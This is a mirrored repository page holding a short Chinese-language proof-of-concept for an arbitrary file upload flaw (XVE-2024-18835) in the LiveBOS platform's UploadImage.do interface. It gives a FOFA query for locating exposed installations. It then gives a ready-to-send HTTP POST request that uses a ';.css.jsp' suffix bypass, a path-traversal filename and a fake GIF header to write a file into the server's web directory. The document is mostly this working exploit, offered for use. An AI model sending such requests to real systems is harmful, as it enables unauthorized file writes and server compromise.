admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/LiveBOS/灵动业务架构平台(LiveBOS)系统UploadImage.do接口文件上传漏洞(XVE-2024-18835).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

34 lines
1019 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 灵动业务架构平台(LiveBOS)系统UploadImage.do接口文件上传漏洞(XVE-2024-18835)
LiveBOS灵动业务架构平台是面向对象的业务支撑平台与建模工具。 在LiveBos的UploadImage.do接口中发现了一处任意文件上传漏洞攻击者可利用该漏洞上传任意文件。
## fofa
```yaml
app="LiveBOS-框架"
```
## poc
```yaml
POST /feed/UploadImage.do;.css.jsp HTTP/1.1
Host:
Httpsendrequestex: true
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Postman-Token: 049266bd-e740-40bf-845f-bc511296894e
Accept-Encoding: gzip, deflate
Cookie: zhzbsessionname=35FF312409BF3CAC561D5BC776643A05
Content-Type: multipart/form-data;boundary=--------------------------WebKitFormBoundaryxegqoxxi
Content-Length: 222
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data;name="file";filename="../../../../../../././../../../../../java/fh/tomcat_fhxszsq/LiveBos/FormBuilder/
feed/jsp/vtnifpvi.js"
Content-Type: image/jpeg
GIF89a 123123123
---WebKitFormBoundaryxegqoxxi--
```
Reference in New Issue View Git Blame Copy Permalink